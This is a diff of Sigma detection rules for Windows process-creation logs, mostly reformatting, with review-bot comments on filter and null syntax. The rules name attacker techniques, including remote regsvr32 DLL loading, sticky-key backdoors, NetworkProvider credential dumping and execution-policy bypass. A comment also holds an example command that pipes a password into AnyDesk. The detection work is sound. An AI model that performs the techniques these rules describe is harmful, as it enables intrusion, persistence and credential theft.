@@ -1,15 +1,11 @@ title: IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols Via CLI id: 10344bb3-7f65-46c2-b915-2d00d47be5b0 related: - - id: 3fd4c8d7-8362-4557-a8e6-83b29cc0d724 - type: similar + - id: 3fd4c8d7-8362-4557-a8e6-83b29cc0d724 + type: similar status: experimental -description: 'Detects changes to Internet Explorer''s (IE / Windows Internet properties) - ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My - Computer" zone. This allows downloaded files from the Internet to be granted the - same level of trust as files stored locally. - - ' +description: | + Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally. references: - https://twitter.com/M_haggis/status/1699056847154725107 - https://twitter.com/JAMESWT_MHT/status/1699042827261391247 @@ -28,7 +24,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - \Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults - http - ' 0' diff --git a/sigma/builtin/process_creation/proc_creation_win_registry_install_reg_debugger_backdoor.yml b/sigma/builtin/process_creation/proc_creation_win_registry_install_reg_debugger_backdoor.yml index 16f7d1e34..e35e1f5e4 100644 --- a/sigma/builtin/process_creation/proc_creation_win_registry_install_reg_debugger_backdoor.yml +++ b/sigma/builtin/process_creation/proc_creation_win_registry_install_reg_debugger_backdoor.yml 
@@ -1,8 +1,7 @@ title: Suspicious Debugger Registration Cmdline id: ae215552-081e-44c7-805f-be16f975c8a2 status: test -description: Detects the registration of a debugger for a program that is available - in the logon screen (sticky key backdoor). +description: Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor). references: - https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/ - https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/ @@ -21,9 +20,9 @@ detection: EventID: 4688 Channel: Security selection1: - CommandLine|contains: \CurrentVersion\Image File Execution Options\ + CommandLine|contains: \CurrentVersion\Image File Execution Options\ selection2: - CommandLine|contains: + CommandLine|contains: - sethc.exe - utilman.exe - osk.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_registry_logon_script.yml b/sigma/builtin/process_creation/proc_creation_win_registry_logon_script.yml index 60ec4c420..74b8a0f63 100644 --- a/sigma/builtin/process_creation/proc_creation_win_registry_logon_script.yml +++ b/sigma/builtin/process_creation/proc_creation_win_registry_logon_script.yml @@ -1,11 +1,10 @@ title: Potential Persistence Via Logon Scripts - CommandLine id: 21d856f9-9281-4ded-9377-51a1a6e2a432 related: - - id: 0a98a10c-685d-4ab0-bddc-b6bdd1d48458 - type: derived + - id: 0a98a10c-685d-4ab0-bddc-b6bdd1d48458 + type: derived status: experimental -description: Detects the addition of a new LogonScript to the registry value "UserInitMprLogonScript" - for potential persistence +description: Detects the addition of a new LogonScript to the registry value "UserInitMprLogonScript" for potential persistence references: - https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html author: Tom Ueltschi (@c_APT_ure) 
@@ -22,10 +21,9 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: UserInitMprLogonScript + CommandLine|contains: UserInitMprLogonScript condition: process_creation and selection falsepositives: - - Legitimate addition of Logon Scripts via the command line by administrators - or third party tools + - Legitimate addition of Logon Scripts via the command line by administrators or third party tools level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_registry_new_network_provider.yml b/sigma/builtin/process_creation/proc_creation_win_registry_new_network_provider.yml index f844b7896..5aae807f6 100644 --- a/sigma/builtin/process_creation/proc_creation_win_registry_new_network_provider.yml +++ b/sigma/builtin/process_creation/proc_creation_win_registry_new_network_provider.yml @@ -1,11 +1,10 @@ title: Potential Credential Dumping Attempt Using New NetworkProvider - CLI id: baef1ec6-2ca9-47a3-97cc-4cf2bda10b77 related: - - id: 0442defa-b4a2-41c9-ae2c-ea7042fc4701 - type: similar + - id: 0442defa-b4a2-41c9-ae2c-ea7042fc4701 + type: similar status: test -description: Detects when an attacker tries to add a new network provider in order - to dump clear text credentials, similar to how the NPPSpy tool does it +description: Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it references: - https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/network-provider-settings-removed-in-place-upgrade - https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy 
@@ -23,9 +22,15 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - \System\CurrentControlSet\Services\ - \NetworkProvider + # filter: + # CommandLine|contains: + # - '\System\CurrentControlSet\Services\WebClient\NetworkProvider' + # - '\System\CurrentControlSet\Services\LanmanWorkstation\NetworkProvider' + # - '\System\CurrentControlSet\Services\RDPNP\NetworkProvider' + # - '\System\CurrentControlSet\Services\P9NP\NetworkProvider' # Related to WSL remove the comment if you use WSL in your ENV condition: process_creation and selection falsepositives: - Other legitimate network providers used and not filtred in this rule diff --git a/sigma/builtin/process_creation/proc_creation_win_registry_privilege_escalation_via_service_key.yml b/sigma/builtin/process_creation/proc_creation_win_registry_privilege_escalation_via_service_key.yml index 2516e7df4..10678ed20 100644 --- a/sigma/builtin/process_creation/proc_creation_win_registry_privilege_escalation_via_service_key.yml +++ b/sigma/builtin/process_creation/proc_creation_win_registry_privilege_escalation_via_service_key.yml @@ -1,8 +1,7 @@ title: Potential Privilege Escalation via Service Permissions Weakness id: 0f9c21f1-6a73-4b0e-9809-cb562cb8d981 status: test -description: Detect modification of services configuration (ImagePath, FailureCommand - and ServiceDLL) in registry by processes with Medium integrity level +description: Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level references: - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment - https://pentestlab.blog/2017/03/31/insecure-registry-permissions/ 
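Review bot: The commented-out `filter` block added under `selection` in proc_creation_win_registry_new_network_provider.yml is not wired into the condition, which remains `condition: process_creation and selection`, so an operator who uncomments the WebClient/LanmanWorkstation/RDPNP/P9NP entries as the trailing comment invites will see no change in matching. The comment block should also carry the line that has to change with it, e.g. `# condition: process_creation and (selection and not filter)`, or the inline comment should say the condition must be updated. The `detection` mapping this hunk sits in starts above the hunk, so the surrounding `selection` and `condition` lines are partly context here. The unchanged `falsepositives` entry still reads "not filtred"; worth fixing while the file is being touched.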
@@ -20,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - ControlSet - services - CommandLine|contains: + CommandLine|contains: - \ImagePath - \FailureCommand - \ServiceDll diff --git a/sigma/builtin/process_creation/proc_creation_win_registry_provlaunch_provisioning_command.yml b/sigma/builtin/process_creation/proc_creation_win_registry_provlaunch_provisioning_command.yml index 9316427ac..cf15bc5e6 100644 --- a/sigma/builtin/process_creation/proc_creation_win_registry_provlaunch_provisioning_command.yml +++ b/sigma/builtin/process_creation/proc_creation_win_registry_provlaunch_provisioning_command.yml @@ -1,15 +1,14 @@ title: Potential Provisioning Registry Key Abuse For Binary Proxy Execution id: 2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25 related: - - id: 7f5d1c9a-3e83-48df-95a7-2b98aae6c13c - type: similar - - id: f9999590-1f94-4a34-a91e-951e47bedefd - type: similar - - id: 7021255e-5db3-4946-a8b9-0ba7a4644a69 - type: similar + - id: 7f5d1c9a-3e83-48df-95a7-2b98aae6c13c # CLI Generic + type: similar + - id: f9999590-1f94-4a34-a91e-951e47bedefd # CLI Abuse + type: similar + - id: 7021255e-5db3-4946-a8b9-0ba7a4644a69 # Registry + type: similar status: experimental -description: Detects potential abuse of the provisioning registry key for indirect - command execution through "Provlaunch.exe". +description: Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe". references: - https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/ - https://twitter.com/0gtweet/status/1674399582162153472 @@ -26,7 +25,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: SOFTWARE\Microsoft\Provisioning\Commands\ + CommandLine|contains: SOFTWARE\Microsoft\Provisioning\Commands\ condition: process_creation and selection falsepositives: - Unknown 
diff --git a/sigma/builtin/process_creation/proc_creation_win_registry_set_unsecure_powershell_policy.yml b/sigma/builtin/process_creation/proc_creation_win_registry_set_unsecure_powershell_policy.yml index b4ffd5f65..95e334c11 100644 --- a/sigma/builtin/process_creation/proc_creation_win_registry_set_unsecure_powershell_policy.yml +++ b/sigma/builtin/process_creation/proc_creation_win_registry_set_unsecure_powershell_policy.yml @@ -1,15 +1,14 @@ title: Potential PowerShell Execution Policy Tampering - ProcCreation id: cf2e938e-9a3e-4fe8-a347-411642b28a9f related: - - id: fad91067-08c5-4d1a-8d8c-d96a21b37814 - type: similar - - id: 87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180 - type: similar - - id: 61d0475c-173f-4844-86f7-f3eebae1c66b - type: similar + - id: fad91067-08c5-4d1a-8d8c-d96a21b37814 # ProcCreation Registry + type: similar + - id: 87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180 # ProcCreation Cmdlet + type: similar + - id: 61d0475c-173f-4844-86f7-f3eebae1c66b # PowerShell ScriptBlock + type: similar status: test -description: Detects changes to the PowerShell execution policy registry key in order - to bypass signing requirements for script execution from the CommandLine +description: Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine references: - https://learn.microsoft.com/de-de/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.3 author: Nasreddine Bencherchali (Nextron Systems) @@ -24,11 +23,11 @@ detection: EventID: 4688 Channel: Security selection_path: - CommandLine|contains: + CommandLine|contains: - \ShellIds\Microsoft.PowerShell\ExecutionPolicy - \Policies\Microsoft\Windows\PowerShell\ExecutionPolicy selection_values: - CommandLine|contains: + CommandLine|contains: - Bypass - RemoteSigned - Unrestricted 
diff --git a/sigma/builtin/process_creation/proc_creation_win_registry_typed_paths_persistence.yml b/sigma/builtin/process_creation/proc_creation_win_registry_typed_paths_persistence.yml index be6389f7b..b90810073 100644 --- a/sigma/builtin/process_creation/proc_creation_win_registry_typed_paths_persistence.yml +++ b/sigma/builtin/process_creation/proc_creation_win_registry_typed_paths_persistence.yml @@ -1,8 +1,7 @@ title: Persistence Via TypedPaths - CommandLine id: ec88289a-7e1a-4cc3-8d18-bd1f60e4b9ba status: test -description: Detects modification addition to the 'TypedPaths' key in the user or - admin registry via the commandline. Which might indicate persistence attempt +description: Detects modification addition to the 'TypedPaths' key in the user or admin registry via the commandline. Which might indicate persistence attempt references: - https://twitter.com/dez_/status/1560101453150257154 - https://forensafe.com/blogs/typedpaths.html @@ -18,7 +17,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: \Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths + CommandLine|contains: \Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml b/sigma/builtin/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml index 13ebe3ef7..fcbabe525 100644 --- a/sigma/builtin/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml +++ b/sigma/builtin/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml 
@@ -1,8 +1,7 @@ title: Potential Regsvr32 Commandline Flag Anomaly id: b236190c-1c61-41e9-84b3-3fe03f6d76b0 status: test -description: Detects a potential command line flag anomaly related to "regsvr32" in - which the "/i" flag is used without the "/n" which should be uncommon. +description: Detects a potential command line flag anomaly related to "regsvr32" in which the "/i" flag is used without the "/n" which should be uncommon. references: - https://twitter.com/sbousseaden/status/1282441816986484737?s=12 author: Florian Roth (Nextron Systems) @@ -19,12 +18,12 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - ' /i:' - ' -i:' - NewProcessName|endswith: \regsvr32.exe + NewProcessName|endswith: \regsvr32.exe filter_main_flag: - CommandLine|contains: + CommandLine|contains: - ' /n ' - ' -n ' condition: process_creation and (selection and not 1 of filter_main_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_regsvr32_http_ip_pattern.yml b/sigma/builtin/process_creation/proc_creation_win_regsvr32_http_ip_pattern.yml index f1ba4697b..6dd0d3eb7 100644 --- a/sigma/builtin/process_creation/proc_creation_win_regsvr32_http_ip_pattern.yml +++ b/sigma/builtin/process_creation/proc_creation_win_regsvr32_http_ip_pattern.yml @@ -1,8 +1,7 @@ title: Potentially Suspicious Regsvr32 HTTP IP Pattern id: 2dd2c217-bf68-437a-b57c-fe9fd01d5de8 status: experimental -description: Detects regsvr32 execution to download and install DLLs located remotely - where the address is an IP address. +description: Detects regsvr32 execution to download and install DLLs located remotely where the address is an IP address. references: - https://twitter.com/mrd0x/status/1461041276514623491 - https://twitter.com/tccontre18/status/1480950986650832903 
@@ -21,10 +20,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \regsvr32.exe - - OriginalFileName: REGSVR32.EXE + - NewProcessName|endswith: \regsvr32.exe + - OriginalFileName: REGSVR32.EXE selection_ip: - CommandLine|contains: + CommandLine|contains: - ' /i:http://1' - ' /i:http://2' - ' /i:http://3' diff --git a/sigma/builtin/process_creation/proc_creation_win_regsvr32_network_pattern.yml b/sigma/builtin/process_creation/proc_creation_win_regsvr32_network_pattern.yml index 799190bad..e2c76cae3 100644 --- a/sigma/builtin/process_creation/proc_creation_win_regsvr32_network_pattern.yml +++ b/sigma/builtin/process_creation/proc_creation_win_regsvr32_network_pattern.yml @@ -1,11 +1,10 @@ title: Potentially Suspicious Regsvr32 HTTP/FTP Pattern id: 867356ee-9352-41c9-a8f2-1be690d78216 related: - - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d - type: obsoletes + - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d + type: obsoletes status: experimental -description: Detects regsvr32 execution to download/install/register new DLLs that - are hosted on Web or FTP servers. +description: Detects regsvr32 execution to download/install/register new DLLs that are hosted on Web or FTP servers. references: - https://twitter.com/mrd0x/status/1461041276514623491 - https://twitter.com/tccontre18/status/1480950986650832903 @@ -24,14 +23,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \regsvr32.exe - - OriginalFileName: REGSVR32.EXE + - NewProcessName|endswith: \regsvr32.exe + - OriginalFileName: REGSVR32.EXE selection_flag: - CommandLine|contains: + CommandLine|contains: - ' /i' - ' -i' selection_protocol: - CommandLine|contains: + CommandLine|contains: - ftp - http condition: process_creation and (all of selection_*) 
diff --git a/sigma/builtin/process_creation/proc_creation_win_regsvr32_remote_share.yml b/sigma/builtin/process_creation/proc_creation_win_regsvr32_remote_share.yml index a92ecf685..f520210f5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_regsvr32_remote_share.yml +++ b/sigma/builtin/process_creation/proc_creation_win_regsvr32_remote_share.yml @@ -17,12 +17,13 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \regsvr32.exe - - OriginalFileName: \REGSVR32.EXE + - NewProcessName|endswith: \regsvr32.exe + - OriginalFileName: \REGSVR32.EXE selection_cli: - CommandLine|contains: ' \\\\' + CommandLine|contains: ' \\\\' condition: process_creation and (all of selection_*) falsepositives: - Unknown +# Decrease to medium if this is something common in your org level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_regsvr32_susp_child_process.yml b/sigma/builtin/process_creation/proc_creation_win_regsvr32_susp_child_process.yml index a8f46b98b..f2a3da2ef 100644 --- a/sigma/builtin/process_creation/proc_creation_win_regsvr32_susp_child_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_regsvr32_susp_child_process.yml @@ -1,8 +1,8 @@ title: Potentially Suspicious Child Process Of Regsvr32 id: 6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca related: - - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d - type: obsoletes + - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d + type: obsoletes status: experimental description: Detects potentially suspicious child processes of "regsvr32.exe". references: @@ -24,7 +24,7 @@ detection: Channel: Security selection: ParentProcessName|endswith: \regsvr32.exe - NewProcessName|endswith: + NewProcessName|endswith: - \calc.exe - \cscript.exe - \explorer.exe 
@@ -40,8 +40,8 @@ detection: - \werfault.exe - \wscript.exe filter_main_werfault: - CommandLine|contains: ' -u -p ' - NewProcessName|endswith: \werfault.exe + CommandLine|contains: ' -u -p ' + NewProcessName|endswith: \werfault.exe condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Unlikely, but can rarely occur. Apply additional filters accordingly. diff --git a/sigma/builtin/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml b/sigma/builtin/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml index b2bd9fc12..411d67ae0 100644 --- a/sigma/builtin/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml +++ b/sigma/builtin/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml @@ -1,11 +1,10 @@ title: Regsvr32 Execution From Potential Suspicious Location id: 9525dc73-0327-438c-8c04-13c0e037e9da related: - - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d - type: obsoletes + - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d + type: obsoletes status: experimental -description: Detects execution of regsvr32 where the DLL is located in a potentially - suspicious location. +description: Detects execution of regsvr32 where the DLL is located in a potentially suspicious location. references: - https://web.archive.org/web/20171001085340/https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html - https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/ @@ -22,10 +21,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \regsvr32.exe - - OriginalFileName: REGSVR32.EXE + - NewProcessName|endswith: \regsvr32.exe + - OriginalFileName: REGSVR32.EXE selection_cli: - CommandLine|contains: + CommandLine|contains: - :\ProgramData\ - :\Temp\ - :\Users\Public\ 
@@ -34,7 +33,6 @@ detection: - \AppData\Roaming\ condition: process_creation and (all of selection_*) falsepositives: - - Some installers might execute "regsvr32" with DLLs located in %TEMP% or in %PROGRAMDATA%. - Apply additional filters if necessary. + - Some installers might execute "regsvr32" with DLLs located in %TEMP% or in %PROGRAMDATA%. Apply additional filters if necessary. level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_regsvr32_susp_exec_path_2.yml b/sigma/builtin/process_creation/proc_creation_win_regsvr32_susp_exec_path_2.yml index 01ca30d0d..c7cc55717 100644 --- a/sigma/builtin/process_creation/proc_creation_win_regsvr32_susp_exec_path_2.yml +++ b/sigma/builtin/process_creation/proc_creation_win_regsvr32_susp_exec_path_2.yml @@ -1,8 +1,7 @@ title: Regsvr32 Execution From Highly Suspicious Location id: 327ff235-94eb-4f06-b9de-aaee571324be status: experimental -description: Detects execution of regsvr32 where the DLL is located in a highly suspicious - locations +description: Detects execution of regsvr32 where the DLL is located in a highly suspicious locations references: - Internal Research author: Nasreddine Bencherchali (Nextron Systems) @@ -18,10 +17,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \regsvr32.exe - - OriginalFileName: REGSVR32.EXE + - NewProcessName|endswith: \regsvr32.exe + - OriginalFileName: REGSVR32.EXE selection_path_1: - CommandLine|contains: + CommandLine|contains: - :\PerfLogs\ - :\Temp\ - \Windows\Registration\CRMLog 
@@ -40,26 +39,28 @@ detection: - \Windows\Tasks\ - \Windows\Tracing\ selection_path_2: - CommandLine|contains: + CommandLine|contains: + # This is to avoid collisions with CLI starting with "C:\" - ' "C:\' - ' C:\' - - ' ''C:\' + - " 'C:\\" - D:\ selection_exclude_known_dirs: - CommandLine|contains: + CommandLine|contains: + # Note: add additional locations that are related to third party applications - C:\Program Files (x86)\ - C:\Program Files\ - C:\ProgramData\ - C:\Users\ + # Note: The space added here are to avoid collisions with the "regsvr32" binary full path - ' C:\Windows\' - ' "C:\Windows\' - - ' ''C:\Windows\' + - " 'C:\\Windows\\" filter_main_empty: - CommandLine: '' + CommandLine: '' filter_main_null: - CommandLine: null - condition: process_creation and (selection_img and (selection_path_1 or (selection_path_2 - and not selection_exclude_known_dirs)) and not 1 of filter_main_*) + CommandLine: + condition: process_creation and (selection_img and (selection_path_1 or (selection_path_2 and not selection_exclude_known_dirs)) and not 1 of filter_main_*) falsepositives: - Unlikely level: high diff --git a/sigma/builtin/process_creation/proc_creation_win_regsvr32_susp_extensions.yml b/sigma/builtin/process_creation/proc_creation_win_regsvr32_susp_extensions.yml index 44e1bfe62..b25c1c03a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_regsvr32_susp_extensions.yml +++ b/sigma/builtin/process_creation/proc_creation_win_regsvr32_susp_extensions.yml 
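Review bot: `filter_main_null` in proc_creation_win_regsvr32_susp_exec_path_2.yml goes from the explicit `CommandLine: null` to a bare `CommandLine:`, which YAML still loads as null but reads like an unfinished key and is flagged by some linters as an empty value; the same substitution appears in `filter_main_null_4688` of proc_creation_win_regsvr32_uncommon_extension.yml further down. Keeping the explicit form, `CommandLine: null`, documents that the filter intentionally matches events with no command line rather than being a leftover. The quoting change from `' ''C:\'` to `" 'C:\\"` produces the same string (a space, a single quote, `C:\`), so that part needs no follow-up. The enclosing `detection` block begins above this hunk.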
@@ -1,11 +1,10 @@ title: Regsvr32 DLL Execution With Suspicious File Extension id: 089fc3d2-71e8-4763-a8a5-c97fbb0a403e related: - - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d - type: obsoletes + - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d + type: obsoletes status: experimental -description: Detects the execution of REGSVR32.exe with DLL files masquerading as - other files +description: Detects the execution of REGSVR32.exe with DLL files masquerading as other files references: - https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/ - https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html @@ -24,10 +23,12 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \regsvr32.exe - - OriginalFileName: REGSVR32.EXE + - NewProcessName|endswith: \regsvr32.exe + - OriginalFileName: REGSVR32.EXE selection_cli: - CommandLine|endswith: + CommandLine|endswith: + # Add more image extensions + # https://twitter.com/Max_Mal_/status/1542461200797163522/photo/3 - .bin - .bmp - .cr2 diff --git a/sigma/builtin/process_creation/proc_creation_win_regsvr32_susp_parent.yml b/sigma/builtin/process_creation/proc_creation_win_regsvr32_susp_parent.yml index 9c12fa559..c3193038b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_regsvr32_susp_parent.yml +++ b/sigma/builtin/process_creation/proc_creation_win_regsvr32_susp_parent.yml 
@@ -1,11 +1,10 @@ title: Scripting/CommandLine Process Spawned Regsvr32 id: ab37a6ec-6068-432b-a64e-2c7bf95b1d22 related: - - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d - type: obsoletes + - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d + type: obsoletes status: experimental -description: Detects various command line and scripting engines/processes such as - "PowerShell", "Wscript", "Cmd", etc. spawning a "regsvr32" instance. +description: Detects various command line and scripting engines/processes such as "PowerShell", "Wscript", "Cmd", etc. spawning a "regsvr32" instance. references: - https://web.archive.org/web/20171001085340/https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html - https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/ @@ -30,14 +29,13 @@ detection: - \powershell.exe - \pwsh.exe - \wscript.exe - NewProcessName|endswith: \regsvr32.exe + NewProcessName|endswith: \regsvr32.exe filter_main_rpcproxy: - CommandLine|endswith: ' /s C:\Windows\System32\RpcProxy\RpcProxy.dll' + CommandLine|endswith: ' /s C:\Windows\System32\RpcProxy\RpcProxy.dll' ParentProcessName: C:\Windows\System32\cmd.exe condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - - Legitimate ".bat", ".hta", ".ps1" or ".vbs" scripts leverage legitimately often. - Apply additional filter and exclusions as necessary + - Legitimate ".bat", ".hta", ".ps1" or ".vbs" scripts leverage legitimately often. Apply additional filter and exclusions as necessary - Some legitimate Windows services -level: medium +level: medium # Can be reduced to low if you experience a ton of FP ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_regsvr32_uncommon_extension.yml b/sigma/builtin/process_creation/proc_creation_win_regsvr32_uncommon_extension.yml index 890195330..061293e7c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_regsvr32_uncommon_extension.yml 
+++ b/sigma/builtin/process_creation/proc_creation_win_regsvr32_uncommon_extension.yml @@ -1,8 +1,7 @@ title: Regsvr32 DLL Execution With Uncommon Extension id: 50919691-7302-437f-8e10-1fe088afa145 status: test -description: Detects a "regsvr32" execution where the DLL doesn't contain a common - file extension. +description: Detects a "regsvr32" execution where the DLL doesn't contain a common file extension. references: - https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/ author: Florian Roth (Nextron Systems) @@ -20,26 +19,25 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \regsvr32.exe - - OriginalFileName: REGSVR32.EXE + - NewProcessName|endswith: \regsvr32.exe + - OriginalFileName: REGSVR32.EXE filter_main_legit_ext: - CommandLine|contains: + CommandLine|contains: + # Note: For better accuracy you might not want to use contains - .ax - .cpl - - .dll + - .dll # Covers ".dll.mui" - .ocx filter_optional_pascal: - CommandLine|contains: .ppl + CommandLine|contains: .ppl filter_optional_avg: - CommandLine|contains: .bav + CommandLine|contains: .bav filter_main_null_4688: - CommandLine: null + CommandLine: filter_main_empty_4688: - CommandLine: '' - condition: process_creation and (selection and not 1 of filter_main_* and not - 1 of filter_optional_*) + CommandLine: '' + condition: process_creation and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - - Other legitimate extensions currently not in the list either from third party - or specific Windows components. + - Other legitimate extensions currently not in the list either from third party or specific Windows components. level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_anydesk.yml b/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_anydesk.yml index a8036ffd3..b2a5e4c32 100644 
--- a/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_anydesk.yml +++ b/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_anydesk.yml @@ -2,20 +2,12 @@ title: Remote Access Tool - AnyDesk Execution id: b52e84a3-029e-4529-b09b-71d19dd27e94 status: test related: - - id: 065b00ca-5d5c-4557-ac95-64a6d0b64d86 - type: similar -description: 'An adversary may use legitimate desktop support and remote access software, - such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive - command and control channel to target systems within networks. - - These services are commonly used as legitimate technical support software, and - may be allowed by application control within a target environment. - - Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared - with other legitimate software commonly used by adversaries. (Citation: Symantec - Living off the Land) - - ' + - id: 065b00ca-5d5c-4557-ac95-64a6d0b64d86 + type: similar +description: | + An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. + These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. + Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows author: frack113 
@@ -32,10 +24,10 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \AnyDesk.exe - - Description: AnyDesk - - Product: AnyDesk - - Company: AnyDesk Software GmbH + - NewProcessName|endswith: \AnyDesk.exe + - Description: AnyDesk + - Product: AnyDesk + - Company: AnyDesk Software GmbH condition: process_creation and selection falsepositives: - Legitimate use diff --git a/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_anydesk_piped_password_via_cli.yml b/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_anydesk_piped_password_via_cli.yml index 87ac7d06a..7d12ac958 100644 --- a/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_anydesk_piped_password_via_cli.yml +++ b/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_anydesk_piped_password_via_cli.yml @@ -1,8 +1,7 @@ title: Remote Access Tool - AnyDesk Piped Password Via CLI id: b1377339-fda6-477a-b455-ac0923f9ec2c status: test -description: Detects piping the password to an anydesk instance via CMD and the '--set-password' - flag. +description: Detects piping the password to an anydesk instance via CMD and the '--set-password' flag. references: - https://redcanary.com/blog/misbehaving-rats/ author: Nasreddine Bencherchali (Nextron Systems) @@ -19,7 +18,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: + # Example: C:\WINDOWS\system32\cmd.exe /C cmd.exe /c echo J9kzQ2Y0qO |C:\ProgramData\anydesk.exe --set-password - '/c ' - 'echo ' - .exe --set-password diff --git a/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_anydesk_silent_install.yml b/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_anydesk_silent_install.yml index 91c1947c0..7ca7a1dd2 100644 --- a/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_anydesk_silent_install.yml 
